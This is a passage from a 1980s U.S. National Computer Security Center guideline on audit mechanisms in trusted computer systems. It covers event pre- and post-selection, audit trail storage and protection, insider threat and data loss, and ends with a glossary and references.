"If the occurrence or accumulation of these security-relevant
events continues, the system shall take the least disruptive
action to terminate the event."(1)  These actions may include
locking the terminal of the user who is causing the event or
terminating the suspect's process(es).  In general, the least
disruptive action is application dependent and there is no
requirement to demonstrate that the action is the least
disruptive of all possible actions.  Any action which terminates
the event is acceptable, but halting the system should be the
last resort.   

                                11

7.5   The A1 Audit Requirement 

7.5.1   Auditable Events 

No new requirements have been added at the A1 class. 

7.5.2   Auditable Information 

No new requirements have been added at the A1 class. 

7.5.3   Audit Basis 

No new requirements have been added at the A1 class. 

                                12 

7.   POSSIBLE IMPLEMENTATION METHODS 

The techniques for implementing the audit requirements will vary 
from system to system depending upon the characteristics of the 
software, firmware, and hardware involved and any optional
features that are to be available.  Technologically advanced
techniques that are available should be used to the best
advantage in the system design to provide the requisite security
as well as cost-effectiveness and performance.  

7.1   Pre/Post Selection of Auditable Events 

There is a requirement at classes C2 and above that all security-
relevant events be auditable.  However, these events may or may
not always be recorded on the audit trail.  Options that may be 
exercised in selecting which events should be audited include a
pre-selection feature and a post-selection feature.  A system may
choose to implement both options, a pre-selection option only, or
a post-selection option only.  

If a system developer chooses not to implement a general pre/post
selection option, there is still a requirement to allow the 
administrator to selectively audit the actions of specified users
for all Criteria classes.  Starting at the B1 class, the 
administrator shall also be able to audit based on object
security level. 

There should be options to allow selection by either individuals
or groups of users.  For example, the administrator may select
events related to a specified individual or select events related
to individuals included in a specified group.  Also, the
administrator may specify that events related to the audit file
be selected or, at classes B1 and above, that accesses to objects
with a given sensitivity level, such as Top Secret, be selected. 

7.1.1   Pre-Selection 

For each auditable event the TCB should contain a mechanism to 
indicate if the event is to be recorded on the audit trail.  The 
system security administrator or designee shall be the only
person authorized to select the events to be recorded. 
Pre-selection may be by user(s) identity, and at the B1 class and
above, pre-selection may also be possible by object security
level.  Although the system security administrator shall be
authorized to select which events are to be recorded, the system
security administrator should not be able to exclude himself from
being audited. 

                                13

Although it would not be recommended, the system security  
administrator may have the capability to select that no events be
recorded regardless of the Criteria requirements.  The intention 
here is to provide flexibility.  The purpose of designing audit 
features into a system is not to impose the Criteria on users
that may not want it, but merely to provide the capability to
implement the requirements. 

A disadvantage of pre-selection is that it is very hard to
predict what events may be of security-relevant interest at a
future date.  There is always the possibility that events not
pre-selected could one day become security-relevant, and the
potential loss from not auditing these events would be impossible
to determine. 

The advantage of pre-selection could possibly be better
performance as a result of not auditing all the events on the
system. 

7.1.2   Post-Selection 

If the post-selection option to select only specified events from
an existing audit trail is implemented, again, only authorized 
personnel shall be able to make this selection.  Inclusion of
this option requires that the system should have trusted
facilities (as described in section 9.1) to accept
query/retrieval requests, to expand any compressed data, and to
output the requested data. 

The main advantage of post-selection is that information that may
prove useful in the future is already recorded on an audit trail
and may be queried at any time. 

The disadvantage involved in post-selection could possibly be 
degraded performance due to the writing and storing of what could
possibly be a very large audit trail. 

7.2   Data Compression 

"Since a system that selects all events to be audited may
generate a large amount of data, it may be necessary to encode
the data to conserve space and minimize the processor time
required" to record the audit records.(3)  If the audit trail is
encoded, a complementary mechanism must be included to decode the
data when required.  The decoding of the audit trail may be done
as a preprocess before the audit records are accessed by the
database or as a postprocess after a relevant record has been 

                                14

found.  Such decoding is necessary to present the data in an 
understandable form both at the administrators terminal and on
batch reports.  The cost of compressing the audit trail would be
the time required for the compression and expansion processes. 
The benefit of compressing data is the savings in storage and the
savings in time to write the records to the audit trail.  

7.3   Multiple Audit Trails 

All events included on the audit trail may be written as part of
the same audit trail, but some systems may prefer to have several
distinct audit trails, e.g., one would be for "user" events, one
for "operator" events, and one for "system security
administrator" events.  This would result in several smaller
trails for subsequent analysis.  In some cases, however, it may
be necessary to combine the information from the trails when
questionable events occur in order to obtain a composite of the
sequence of events as they occurred.  In cases where there are
multiple audit trails, it is preferred that there be some
accurate, or at least synchronized, time stamps across the
multiple logs.    

Although the preference for several distinct audit trails may be 
present, it is important to note that it is often more useful
that the TCB be able to present all audit data as one
comprehensive audit trail. 

7.4   Physical Storage 

A factor to consider in the selection of the medium to be used
for the audit trail would be the expected usage of the system. 
The I/O volume for a system with few users executing few
applications would be quite different from that of a large system
with a multitude of users performing a variety of applications. 
In any case, however, the system should notify the system
operator or administrator when the audit trail medium is
approaching its storage capacity.  Adequate advance notification
to the operator is especially necessary if human intervention is
required.   

If the audit trail storage medium is saturated before it is 
replaced, the operating system shall detect this and take some 
appropriate action such as: 

1.  Notifying the operator that the medium is "full" and action  
    is necessary.  The system should then stop and require       
    rebooting.  Although a valid option, this action creates a   

                                15

    severe threat of denial-of-service attacks. 

2.  Storing the current audit records on a temporary medium with 
    the intention of later migration to the normal operational   
    medium, thus allowing auditing to continue.  This temporary  
    storage medium should be afforded the same protection as the 
    regular audit storage medium in order to prevent any attempts 
    to tamper with it. 

3.  Delaying input of new actions and/or slowing down current    
    operations to prevent any action that requires use of the    
    audit mechanism. 

4.  Stopping until the administrative personnel make more space  
    available for writing audit records.    

5.  Stopping auditing entirely as a result of a decision by the  
    system security administrator. 

Any action that is taken in response to storage overflow shall be 
audited.  There is, however, a case in which the action taken may
not be audited that deserves mention.  It is possible to have the
system security administrator's decisions embedded in the system 
logic.  Such pre-programmed choices, embedded in the system
logic, may be triggered automatically and this action may not be
audited. 

Still another consideration is the speed at which the medium 
operates.  It should be able to accommodate the "worst case" 
condition such as when there are a large number of users on the 
system and all auditable events are to be recorded.  This worst
case rate should be estimated during the system design phase and
(when possible) suitable hardware should be selected for this
purpose. 

Regardless of how the system handles audit trail overflow, there 
must be a way to archive all of the audit data.  

7.5   Write-Once Device 

For the lower Criteria classes (e.g., C2, B1) the audit trail may
be the major tool used in detecting security compromises. 
Implicit in this is that the audit resources should provide the
maximum protection possible.  One technique that may be employed
to protect the audit trail is to record it on a mechanism
designed to be a write-only device.  Other choices would be to
set the designated device to write-once mode by disabling the 

                                16

read mechanism.  This method could prevent an attacker from
erasing or modifying the data already written on the audit trail
because the attacker will not be able to go back and read or find
the data that he or she wishes to modify.   

If a hardware device is available that permits only the writing
of data on a medium, modification of data already recorded would
be quite difficult.  Spurious messages could be written, but to
locate and modify an already recorded message would be difficult. 
Use of a write-once device does not prevent a penetrator from
modifying audit resources in memory, including any buffers, in
the current audit trail. 

If a write-once device is used to record the audit trail, the
medium can later be switched to a compatible read device to allow 
authorized personnel to analyze the information on the audit
trail in order to detect any attempts to penetrate the system. 
If a penetrator modified the audit software to prevent writing
records on the audit trail, the absence of data during an
extended period of time would indicate a possible security
compromise.  The disadvantage of using a write-once device is
that it necessitates a delay before the audit trail is available
for analysis by the administrator.  This may be offset by
allowing the system security administrator to review the audit
trail in real-time by getting copies of all audit records on
their way to the device. 

7.6   Forwarding Audit Data 

If the facilities are available, another method of protecting the
audit trail would be to forward it to a dedicated processor.  The
audit trail should then be more readily available for analysis by
the system security administrator.  

                                17 

8.  OTHER TOPICS 

8.1   Audit Data Reduction 

Depending upon the amount of activity on a system and the audit 
selection process used, the audit trail size may vary.  It is a
safe assumption though, that the audit trail would grow to sizes
that would necessitate some form of audit data reduction.  The
data reduction tool would most likely be a batch program that
would interface to the system security administrator.  This batch
run could be a combination of database query language and a
report generator with the input being a standardized audit file. 

Although they are not necessarily part of the TCB, the audit 
reduction tools should be maintained under the same configuration
control system as the remainder of the system. 

8.2  Availability of Audit Data 

In standard data processing, audit information is recorded as it 
occurs.  Although most information is not required to be
immediately available for real-time analysis, the system security
administrator should have the capability to retreive audit
information within minutes of its recording.  The delay between
recording audit information and making it available for analysis
should be minimal, in the range of several minutes.   

For events which do require immediate attention, at the B3 class
and above, an alert shall be sent out to the system security 
administrator.  In systems that store the audit trail in a
buffer, the system security administrator should have the
capability to cause the buffer to be written out.  Regarding
real-time alarms, where they are sent is system dependent.   

8.3  Audit Data Retention 

The exact period of time required for retaining the audit trail  
is site dependent and should be documented in the site's
operating procedures manual.  When trying to arrive at the
optimum time for audit trail retention, any time restrictions on
the storage medium should be considered.  The storage medium used
must be able to reliably retain the audit data for the amount of
time required by the site.     

The audit trail should be reviewed at least once a week.  It is
very possible that once a week may be too long to wait to review 

                                18

the audit trail.  Depending on the amount of audit data expected 
by the system, this parameter should be adjusted accordingly. 
The recommended time in between audit trail reviews should be
documented in the Trusted Facility Manual.      

8.4  Testing 

The audit resources, along with all other resources protected by
the TCB, have increasing assurance requirements at each higher
Criteria class.  For the lower classes, an audit trail would be a
major factor in detecting penetration attempts.  Unfortunately,
at these lower classes, the audit resources are more susceptible
to penetration and corruption.  "The TCB must provide some
assurance that the data will still be there when the
administrator tries to use it."(3)  The testing requirement
recognizes the vulnerability of the audit trail, and starting
with the C2 class, shall include a search for obvious flaws that
would corrupt or destroy the audit trail.  If the audit trail is
corrupted or destroyed, the existence of such flaws indicates
that the system can be penetrated.  Testing should also be
performed to uncover any ways of circumventing the audit
mechanisms.  The "flaws found in testing may be neutralized in 
any of a number of ways.  One way available to the system
designer is to audit all uses of the mechanism in which the flaw
is found and to log such events."(3)  An attempt should be made
to remove the flaw.   

At class B2 and above, it is required that all detected flaws
shall be corrected or else a lower rating will be given.  If
during testing the audit trail appears valid, analysis of this
data can verify that it does or does not accurately reflect the
events that should be included on the audit trail.  Even though
system assurances may increase at the higher classes, the audit
trail is still an effective tool during the testing phase as well
as operationally in detecting actual or potential security
compromises. 

8.5  Documentation  

Starting at the C2 class, documentation concerning the audit 
requirements shall be contained in the Trusted Facility Manual.  
The Trusted Facility Manual shall explain the procedures to
record, examine, and maintain audit files.  It shall detail the
audit record structure for each type of audit event, and should
include what each field is and what the size of the field is. 

The Trusted Facility Manual shall also include a complete  

                                19

description of the audit mechanism interface, how it should be
used, its default settings, cautions about the trade-offs
involved in using various configurations and capabilities, and
how to set up and run the system such that the audit data is 
afforded appropriate protection. 

If audit events can be pre- or post-selected, the manual should
also describe the tools and mechanisms available and how they are
to be used. 

8.6  Unavoidable Security Risks 

There are certain risks contained in the audit process that exist
simply because there is no way to prevent these events from ever 
occurring.  Because there are certain unpredictable factors  
involved in auditing, i.e., man, nature, etc., the audit
mechanism may never be one hundred per cent reliable.  Preventive
measures may be taken to minimize the likelihood of any of these
factors adversely affecting the security provided by the audit
mechanism, but no audit mechanism will ever be risk free.      

8.6.1   Auditing Administrators/Insider Threat 

Even with auditing mechanisms in place to detect and deter
security violations, the threat of the perpetrator actually being
the system security administrator or someone involved with the
system security design will always be present.  It is quite
possible that the system security administrator of a secure
system could stop the auditing of activities while entering the
system and corrupting files for personal benefit.  These
authorized personnel, who may also have access to identification
and authentication information, could also choose to enter the
system disguised as another user in order to commit crimes under
a false identity.  

Management should be aware of this risk and should be certain to 
exercise discretion when selecting the system security 
administrator.  The person who is to be selected for a trusted 
position, such as the system security administrator, should be 
subject to a background check before being granted the privileges
that could one day be used against the employer.   

The system security administrator could also be watched to ensure
that there are no unexplained variances in normal duties.  Any 
deviation from the norm of operations may indicate that a
violation of security has occurred or is about to occur. 

                                20

An additional security measure to control this insider threat is
to ensure that the system administrator and the person
responsible for the audit are two different people.  "The
separation of the auditor's functions, databases, and access
privileges from those of the system administrator is an important
application of the separation of privilege and least privilege 
principles.  Should such a separation not be performed, and
should the administrator be allowed to undertake auditor
functions or vice-versa, the entire security function would
become the responsibility of a single, unaccountable
individual."(2) 

Another alternative may be to employ separate auditor roles. 
Such a situation may give one person the authority to turn off
the audit mechanism, while another person may have the authority
to turn it back on.  In this case no individual would be able to
turn off the audit mechanism, compromise the system, and then
turn it back on. 

8.6.2   Data Loss 

Although the audit software and hardware are reliable security  
mechanisms, they are not infallible.  They, like the rest of the 
system, are dependent upon constant supplies of power and are  
readily subject to interruption due to mechanical or power
failures.  Their failure can cause the loss or destruction of
valuable audit data.  The system security administrator should be
aware of this risk and should establish some procedure that would
ensure that the audit trail is preserved somewhere.  The system
security administrator should duplicate the audit trail on a
removable medium at certain points in time to minimize the data
loss in the event of a system failure.  The Trusted Facility
Manual should include what the possibilities and nature of loss
exposure are, and how the data may be recovered in the event that
a catastrophe does occur.  

If a mechanical or power failure occurs, the system security 
administrator should ensure that audit mechanisms still function 
properly after system recovery.  For example, any auditing
mechanism options pre-selected before the system malfunction must
still be the ones in operation after the system recovery.   

                                21 

9.  AUDIT SUMMARY 

For classes C2 and above, it is required that the TCB "be able to
create, maintain, and protect from modification or unauthorized 
access or destruction an audit trail of accesses to the objects
it protects."(1)  The audit trail plays a key role in performing
damage assessment in the case of a corrupted system.   

The audit trail shall keep track of all security-relevant events 
such as the use of identification and authentication mechanisms, 
introduction of objects into a user's address space, deletion of 
objects from the system, system administrator actions, and any
other events that attempt to violate the security policy of the
system.  The option should exist that either all activities be
audited or that the system security administrator select the
events to be audited.  If it is decided that all activities
should be audited, there are overhead factors to be considered. 
The storage space needed for a total audit would generally
require more operator maintenance to prevent any loss of data and
to provide adequate protection.  A requirement exists that
authorized personnel shall be able to read all events recorded on
the audit trail.  Analysis of the total audit trail would be both
a difficult and time-consuming task for the administrator.  Thus,
a selection option is required which may be either a
pre-selection or post-selection option.   

The audit trail information should be sufficient to reconstruct a
complete sequence of security-relevant events and processes for a
system.  To do this, the audit trail shall contain the following 
information:  date and time of the event, user, type of event, 
success or failure of the event, the origin of the request, the
name of the object introduced into the user's address space,
accessed, or deleted from the storage system, and at the B1 class
and above, the sensitivity determination of the object. 

It should be remembered that the audit trail shall be included in
the Trusted Computing Base and shall be accorded the same
protection as the TCB.  The audit trail shall be subject to
strict access controls. 

An effective audit trail is necessary in order to detect and 
evaluate hostile attacks on a system.    

                                22 

GLOSSARY

Administrator - Any one of a group of personnel assigned to 
supervise all or a portion of an ADP system.   

Archive - To file or store records off-line. 

Audit - To conduct the independent review and examination of 
system records and activities. 

Auditor - An authorized individual with administrative duties,
whose duties include selecting the events to be audited on the
system, setting up the audit flags which enable the recording of
those events, and analyzing the trail of audit events.(2) 

Audit Mechanism - The device used to collect, review, and/or
examine system activities. 

Audit Trail - A set of records that collectively provide
documentary evidence of processing used to aid in tracing from
original transactions forward to related records and reports,
and/or backwards from records and reports to their component
source transactions.(1) 

Auditable Event - Any event that can be selected for inclusion in
the audit trail.  These events should include, in addition to 
security-relevant events, events taken to recover the system
after failure and any events that might prove to be
security-relevant at a later time.  

Authenticated User - A user who has accessed an ADP system with a
valid identifier and authentication combination.  

Automatic Data Processing (ADP) System - An assembly of computer 
hardware, firmware, and software configured for the purpose of 
classifying, sorting, calculating, computing, summarizing, 
transmitting and receiving, storing, and retrieving data with a 
minimum of human intervention.(1) 

Category - A grouping of classified or unclassified sensitive 
information, to which an additional restrictive label is applied 
(e.g., proprietary, compartmented information) to signify that 
personnel are granted access to the information only if they have
formal approval or other appropriate authorization.(4)  

Covert Channel - A communication channel that allows a process to 
transfer information in a manner that violates the system's
security policy.(1) 

                                23 

Covert Storage Channel - A covert channel that involves the
direct or indirect writing of a storage location by one process
and the direct or indirect reading of the storage location by
another process.  Covert storage channels typically involve a
finite resource (e.g., sectors on a disk) that is shared by two
subjects at different security levels.(1) 

Covert Timing Channel - A covert channel in which one process 
signals information to another by modulating its own use of
system resources (e.g., CPU time) in such a way that this
manipulation affects the real response time observed by the
second process.(1) 

Flaw - An error of commission, omission or oversight in a system 
that allows protection mechanisms to be bypassed.(1) 

Object - A passive entity that contains or receives information. 
Access to an object potentially implies access to the information
it contains.  Examples of objects are:  records, blocks, pages, 
segments, files, directories, directory trees and programs, as
well as bits, bytes, words, fields, processors, video displays, 
keyboards, clocks, printers, network nodes, etc.(1) 

Post-Selection - Selection, by authorized personnel, of specified
events that had been recorded on the audit trail. 

Pre-Selection - Selection, by authorized personnel, of the
auditable events that are to be recorded on the audit trail. 

Security Level - The combination of a hierarchical classification
and a set of non-hierarchical categories that represents the 
sensitivity of information.(1) 

Security Policy - The set of laws, rules, and practices that 
regulate how an organization manages, protects, and distributes 
sensitive information.(1) 

Security-Relevant Event - Any event that attempts to change the  
security state of the system,  (e.g., change discretionary access
controls, change the security level of the subject, change user  
password, etc.).  Also, any event that attempts to violate the  
security policy of the system, (e.g., too many attempts to login,
attempts to violate the mandatory access control limits of a
device, attempts to downgrade a file, etc.).(1) 

Sensitive Information - Information that, as determined by a 
competent authority, must be protected because its unauthorized 
disclosure, alteration, loss, or destruction will at least cause 
perceivable damage to someone or something.(1) 

                                24

Subject - An active entity, generally in the form of a person,  
process, or device that causes information to flow among objects
or changes the system state.  Technically, a process/domain
pair.(1) 

Subject Sensitivity Level - The sensitivity level of the objects
to which the subject has both read and write access.  A subject's
sensitivity level must always be less than or equal to the
clearance of the user the subject is associated with.(4) 

System Security Administrator - The person responsible for the 
security of an Automated Information System and having the
authority to enforce the security safeguards on all others who
have access to the Automated Information System.(4)  

Trusted Computing Base (TCB) - The totality of protection
mechanisms within a computer system -- including hardware,
firmware, and software -- the combination of which is responsible
for enforcing a security policy.  A TCB consists of one or more
components that together enforce a unified security policy over a
product or system.  The ability of a TCB to correctly enforce a
security policy depends solely on the mechanisms within the TCB
and on the correct input by system administrative personnel of
parameters (e.g., a user's clearance) related to the security
policy.(1) 

User - Any person who interacts directly with a computer
system.(1) 

                                25 

REFERENCES 

1.    National Computer Security Center, DoD Trusted Computer    
      System Evaluation Criteria, DoD, DoD 5200.28-STD, 1985. 

2.    Gligor, Virgil D., "Guidelines for Trusted Facility        
      Management and Audit," University of Maryland, 1985. 

3.    Brown, Leonard R., "Guidelines for Audit Log Mechanisms in 
      Secure Computer Systems," Technical Report                 
      TR-0086A(2770-29)-1, The Aerospace Corporation, 1986. 

4.    Subcommittee on Automated Information System Security,     
      Working Group #3, "Dictionary of Computer Security         
      Terminology," 23 November 1986. 

5.    National Computer Security Center, Criterion               
      Interpretation, Report No. C1-C1-02-87, 1987. 

                                26����������������������������������������������������������������������